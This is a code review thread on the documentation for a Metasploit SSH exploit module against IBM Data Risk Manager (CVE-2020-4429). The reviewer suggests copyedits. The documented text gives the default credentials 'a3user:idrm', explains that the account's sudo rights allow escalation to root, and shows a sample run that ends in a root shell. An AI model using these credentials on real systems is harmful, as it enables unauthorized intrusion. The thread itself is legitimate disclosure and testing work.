Add SSH exploit for IBM Data Risk Manager (CVE-2020-4429) (#13304)
rapid7/metasploit-framework: documentation/modules/exploit/linux/ssh/ibm_drm_a3user.md

> ## Vulnerable Application

Reviewer: ```suggestion
## Vulnerable Application

```

> This module abuses a known default password on IBM Data Risk Manager. The 'a3user' has the default password 'idrm', and allows an attacker to login to the virtual appliance via SSH. 

Reviewer: ```suggestion
This module abuses a known default password in IBM Data Risk Manager. The 'a3user' has the default password 'idrm' and allows an attacker to log in to the virtual appliance via SSH. 
```

> This can be escalated to a full root access, as 'a3user' has sudo access with the default password.

Reviewer: ```suggestion
This can be escalated to full root access, as 'a3user' has `sudo` access with the default password.
```

> At the time of disclosure, this is a 0 day. Versions <= 2.0.3 are confirmed to be affected, and the latest 2.0.6 is most likely affected too.

Reviewer: ```suggestion
At the time of disclosure, this is a 0day. Versions <= 2.0.3 are confirmed to be affected, and the latest 2.0.6 is most likely affected too.
```

> **Vulnerable Application Installation Steps**

Reviewer: ```suggestion
### Setup
```

> The application is available to download as Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.

Reviewer: ```suggestion
The application is available to download as a Linux virtual appliance from IBM's website. You need to have a valid IBM contract to be able to do so.
```

## Verification Steps

> Module defaults work very well, you should just need to set RHOSTS!

Reviewer: ```suggestion
Module defaults work very well, you should just need to set `RHOSTS`!
```

> A successful exploit will look like this:

Reviewer: ```suggestion

## Scenarios

A successful exploit will look like this:
```

```
msf5 exploit(linux/ssh/ibm_drm_a3user) > run
[*] 10.22.22.212:22 - Attempting to login to the IBM Data Risk Manager appliance...
[+] 10.22.22.212:22 - Login Successful (a3user:idrm)
[*] Found shell.
[*] Command shell session 5 opened (10.22.22.1:45489 -> 10.22.22.212:22) at 2020-04-22 12:10:13 +0700
[*] 10.22.22.212:22 - Escalating privileges to root, please wait a few seconds...
[+] 10.22.22.212:22 - Done, enjoy your root shell!
uname -a
Linux idrm-server.ibm.com 3.10.0-862.3.2.el7.x86_64 #1 SMP Tue May 15 18:22:15 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
id
uid=0(root) gid=0(root) groups=0(root)
```

> ## Vulnerability information

Reviewer: Move this blurb under the `Vulnerable Application` H2 and make it an H3 or drop the header.

Author: done

> For more information about the vulnerability check the advisory at:

Reviewer: When you do move it:

```suggestion
For more information about the vulnerability, check the advisory at:
```
